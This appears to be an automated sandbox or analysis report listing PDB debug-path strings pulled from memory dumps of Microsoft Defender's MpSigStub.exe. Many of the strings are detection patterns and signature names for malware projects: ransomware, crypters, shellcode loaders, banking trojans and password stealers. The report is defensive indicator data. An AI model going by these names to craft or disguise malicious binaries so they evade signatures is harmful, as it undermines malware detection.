Source: Binary string: stscast.pdb source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp
Source: Binary string: winscard.pdb source: MpSigStub.exe, 00000023.00000003.18319810399.0000015B1BE00000.00000004.00000001.sdmp
Source: Binary string: bin\Release\LiveUpdateWPP.pdbxd source: MpSigStub.exe, 00000023.00000003.18301552816.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: ^shell\BATLE_SOURCE\SampleService_run_shellcode_from-memory10-02-2016\Release\SampleService.pdb source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp
Source: Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: \InstallGoogleToolBar\InstallGoogleToolBar\obj\Debug\InstallGoogleToolBar.pdb source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp
Source: Binary string: \Release\shellcode.pdb source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: \ProcExpDriver.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: \Current\wear.pdb source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp
Source: Binary string: PCSUQuickScan.pdb source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp
Source: Binary string: hWEHW#@HJERKJERJER^$.Pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: e:\caoe.PDBa source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: \yacdl\Release\yacdl.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: Krypton\source\repos\UAC\UAC\obj\Release\UAC.pdb source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp
Source: Binary string: mpengine.pdb source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp
Source: Binary string: XrfZPp2C.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: UsoCoreWorker.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: Z:\\Work\\Make Troy\\Concealment Troy\\Exe_Concealment_Troy\(Winlogon_Shell\)\\.*.pdb source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp
Source: Binary string: _sa\bin\Release\ClientSAHook.pdb source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp
Source: Binary string: w:\work\vcprj\prj\downloader\Release\injdldr.pdb source: MpSigStub.exe, 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp
Source: Binary string: c:\To\In\All\With\Within\Value.pdb source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp
Source: Binary string: security.pdb source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb0 source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp
Source: Binary string: \\MoonRat_Develop\\.+\\obj\\Release\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: \bin\Release.Minimal\officer.pdb source: MpSigStub.exe, 00000023.00000003.18302834450.0000015B1BFE8000.00000004.00000001.sdmp
Source: Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdb source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp
Source: Binary string: \InstallerMainV6_Yrrehs\Release\Main.pdb source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp
Source: Binary string: adptif.pdb3 source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp
Source: Binary string: LiuLiangBao\Release\LiuLiangBao.pdb source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp
Source: Binary string: \Conduit\RnD\Client\IE\Dev\6.16\6.16.1\Release\hk64tbedrs.pdb source: MpSigStub.exe, 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp
Source: Binary string: D:\yo\chaos\Release\chaos.pdb source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp
Source: Binary string: nafde.pdb source: MpSigStub.exe, 00000023.00000003.18301552816.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp
Source: Binary string: autofmt.pdb source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp
Source: Binary string: PoolMonPlugin.pdb source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp
Source: Binary string: TuneUpUtilitiesApp32.pdb source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp
Source: Binary string: d:\pavbld\amcore\Signature\Source\sigutils\vdlls\Microsoft.NET\VFramework\mscorlib\mscorlib.pdb source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp
Source: Binary string: sfc.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: \Projects\FlashPlayerPlugin\FlashPlayerPlugin\obj\Release\FlashPlayerPlugin.pdb source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp
Source: Binary string: Uc:\Users\Main\Desktop\PackagingModule\PackagingModule\obj\Release\PackagingModule.pdb] source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp
Source: Binary string: AWInstaller.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: HookPasswordReset.pdb source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp
Source: Binary string: padcryptUninstaller\obj\Debug\padcryptUninstaller.pdb source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp
Source: Binary string: e:\mpengine\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System.Xml\System.Xml.pdb source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp
Source: Binary string: PassView.pdb source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp
Source: Binary string: Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp
Source: Binary string: tdc.pdb3 source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: msoert2.pdb source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: Tokenvator.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: I \\WOO\\HT\\AD_Attacker\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdbx source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp
Source: Binary string: \iSafe\trunk\bin\iSafeSvc2.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\finger\objfre\i386\finger.pdb source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp
Source: Binary string: nanamnana\obj\Debug\nanamnana.pdbx source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp
Source: Binary string: dfsfgjfgdes.pdb source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp
Source: Binary string: L6\\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: Qc:\users\mz\documents\visual studio 2013\Projects\Shellcode\Release\Shellcode.pdb] source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp
Source: Binary string: \Release\initialexe\torch.exe.pdb source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: \Akl\kh\Release\kh.pdb source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\ebclient\dmsetup\dmsched2\Release\dmsched2.pdbx source: MpSigStub.exe, 00000023.00000003.18311861284.0000015B1C02A000.00000004.00000001.sdmp
Source: Binary string: \ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdb source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp
Source: Binary string: \\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: (d:\p\loser\a\a\objfre_wxp_x86\i386\A.pdb source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp
Source: Binary string: -\BetterInstaller\Release\BetterInstaller.pdb source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp
Source: Binary string: dxva2.pdb3 source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp
Source: Binary string: D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: obj\Debug\WinCalendar.pdb source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp
Source: Binary string: D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp
Source: Binary string: Qc:\users\mz\documents\visual studio 2013\Projects\Shellcode\Release\Shellcode.pdb source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp
Source: Binary string: subst.pdb source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp
Source: Binary string: \BaseFlash.pdb source: MpSigStub.exe, 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp
Source: Binary string: schtasks.pdbd source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp
Source: Binary string: Win32\Release\Sdrsrv.pdb source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp
Source: Binary string: Cryptor_noVSSnoPers.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: \Release\SSEngine.pdb source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp
Source: Binary string: C:\mainProduct(old)\x86_bild_cryptor\shell_gen\Release\data_protect2.pdb source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\lodctr\objchk\i386\lodctr.pdb source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp
Source: Binary string: Archer_Add_Packet\Release\Packet.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: \tcrypt\Release\s_low.pdbx source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp
Source: Binary string: \R980\Release\R980.pdb source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp
Source: Binary string: P'Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp
Source: Binary string: M(\\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: KSLD.pdbGCTL source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp
Source: Binary string: freefilesync_x64.pdb source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp
Source: Binary string: \T+M\Result\DocPrint.pdb] source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp
Source: Binary string: \13930308\Bot_70_FIX HEADER_FIX_LONGURL 73_StableAndNewProtocol - login all\Release\Bot.pdb source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp
Source: Binary string: \Release\mailermodule199.pdb source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp
Source: Binary string: P)E:\\Production\\Tool-Developing\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp
Source: Binary string: d:\74\55\Child\Require\bank\Bear\rather\66\Boy\front\special\straight\wood\1\guide.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp
Source: Binary string: KSLD.pdb source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp
Source: Binary string: \wyvernlocker.pdb source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp
Source: Binary string: \SecurityService\SecurityService\obj\Release\WindowsSecurityService.pdb source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: cryptdll.pdb source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: 2gerGW@4herhw*9283y4huWO.pdb] source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: D:\Projekty\EvulSoft\TibiSavePass\Programy\Stub VISUAL\Release\Stub VISUAL.pdb source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp
Source: Binary string: !#HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: .+:\\.+\\.*Pedro\\.*PH_Secret_Application.*\\PH_Secret_Application.*\\.+\\Release\\.*.pdb source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp
Source: Binary string: !6zyA6@267=HPS.C|dMqd4-qaN|yjm.pdb source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: eTiq_WaEN__y9F89zLukjmM.pdbx source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: pid.pdb3 source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: @.pdb source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp
Source: Binary string: HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp
Source: Binary string: vssadmin.pdb source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp
Source: Binary string: ciTfDCxMQU0a5/DDEyGwn8ta.z4.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: r:\rel\iMS-srvreg56.pdb source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: 50G:\\combustion\\aiding\\breaching\\stooping.pdb source: MpSigStub.exe, 00000023.00000003.18294597236.0000015B1A5CB000.00000004.00000001.sdmp
Source: Binary string: \Release\Cloudy.pdb] source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp
Source: Binary string: msnetobj.pdb3 source: MpSigStub.exe, 00000023.00000003.18343980449.0000015B1ACD2000.00000004.00000001.sdmp
Source: Binary string: lsasrv.pdb source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-comm-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: llq001\src\out\Official\UpdateChecker.exe.pdb source: MpSigStub.exe, 00000023.00000003.18339677269.0000015B1AB04000.00000004.00000001.sdmp
Source: Binary string: fA\\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: \ransom.pdb source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp
Source: Binary string: K8MiniPage.pdb source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp
Source: Binary string: PELoader.pdb source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp
Source: Binary string: _darkshell\i386\DarkShell.pdb] source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp
Source: Binary string: d:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: Session.*\\Release\\GenIt\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: \Release\ProtectedService.pdb source: MpSigStub.exe, 00000023.00000003.18311262453.0000015B1BE1B000.00000004.00000001.sdmp
Source: Binary string: out\Release\360EntClient.pdb source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp
Source: Binary string: msvfw32.pdb` source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp
Source: Binary string: \release\LSASecretsView.pdbx source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp
Source: Binary string: [cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: #CNC Plugins Tools\ProgFactory_d.pdb source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp
Source: Binary string: SelfMother\SeaFriend\SmallStore\save.pdb source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp
Source: Binary string: *.pdb.|!\VstsGitSourceIndex.exe source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp
Source: Binary string: \Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp
Source: Binary string: BrowserManager.pdbxx source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: F:\rdpscan\Bin\Release_logged\x64\rdpscan.pdb source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp
Source: Binary string: 4G:\Work\Bison\BisonNewHNStubDll\Release\Goopdate.pdb] source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: 'D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: \FARATCLIENT\obj\Debug\FARATCLIENT.pdb source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp
Source: Binary string: msvfw32.pdb source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp
Source: Binary string: hal.pdb source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp
Source: Binary string: JOe|OBzjATck#psb/.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: \mspass.pdb source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp
Source: Binary string: \bin\pxdl.pdb source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp
Source: Binary string: JwEEPNd--41U6@yY_2Y.WDH6GG*6RbR.pdb source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp
Source: Binary string: flzEnlAs.pdb source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp
Source: Binary string: D:\WorkObject\SupL_EnableBHO\BHOEnabler\bin\BHOEnabler.pdb source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp
Source: Binary string: WirelessKeyView.pdb source: MpSigStub.exe, 00000023.00000003.18311861284.0000015B1C02A000.00000004.00000001.sdmp
Source: Binary string: i=[cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: \SSFK\Release\SSFK.pdb source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp
Source: Binary string: $\SuperLight\release\MfcDllServer.pdb source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: 3.C:\\Obnubilate\\Temp\\[a-z0-9]{26}\\Stub\.pdb source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp
Source: Binary string: Release\adviser.pdb source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp
Source: Binary string: <7\\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp
Source: Binary string: JJDownLoader\Bin\JJDownLoader_a.pdb source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp
Source: Binary string: \tutorial\Release\CoffeeShop6.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: iashlpr.pdb source: MpSigStub.exe, 00000023.00000003.18344667874.0000015B1B06E000.00000004.00000001.sdmp
Source: Binary string: .C:\source\src\nssm\out\Release\win64\absrv.pdb source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp
Source: Binary string: ZAService.pdb source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp
Source: Binary string: gMolq.pdb source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp
Source: Binary string: O&\\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp
Source: Binary string: rafotech\minisoft\tools\xyfa\Release\xyfa.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: rStub\LimitlessLoggerStub\obj\x86\Debug\LLS.pdb source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp
Source: Binary string: RamMap.pdb source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp
Source: Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdbxm source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp
Source: Binary string: c:\\Injekt - Builds\\.*\\SpeedBrowserP\\Source\\shortcut\\Encoder\\obj\\Release\\shortcut.pdb source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp
Source: Binary string: aeroadmin.pdb source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp
Source: Binary string: rpcss.pdb source: MpSigStub.exe, 00000023.00000003.18320569449.0000015B1B556000.00000004.00000001.sdmp
Source: Binary string: \starter.pdb source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp
Source: Binary string: \Release\UpdaterService.pdb source: MpSigStub.exe, 00000023.00000003.18311262453.0000015B1BE1B000.00000004.00000001.sdmp
Source: Binary string: \Rasomware2.0.pdb source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp
Source: Binary string: You\Above\Particular\Exception.pdb source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp
Source: Binary string: \down\Wing\Would.pdb source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp
Source: Binary string: mafia2injector\Release\MafiaInjector.pdb source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp
Source: Binary string: \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: m3KHLMcF.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: sdmf|er.pdb source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp
Source: Binary string: \Release\TKCodeDDoS.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp
Source: Binary string: CrossLoopService.pdb source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp
Source: Binary string: F:\Projects\WebInject\bin\x86\Release_logged\payload32.pdb source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp
Source: Binary string: \Release\winsrcsrv.pdb source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp
Source: Binary string: hcd:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: ir41_qcx.pdb source: MpSigStub.exe, 00000023.00000003.18344667874.0000015B1B06E000.00000004.00000001.sdmp
Source: Binary string: G\SharedSerialization\obj\Release\netstandard2.0\SharedSerialization.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: dbmsrpcn.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
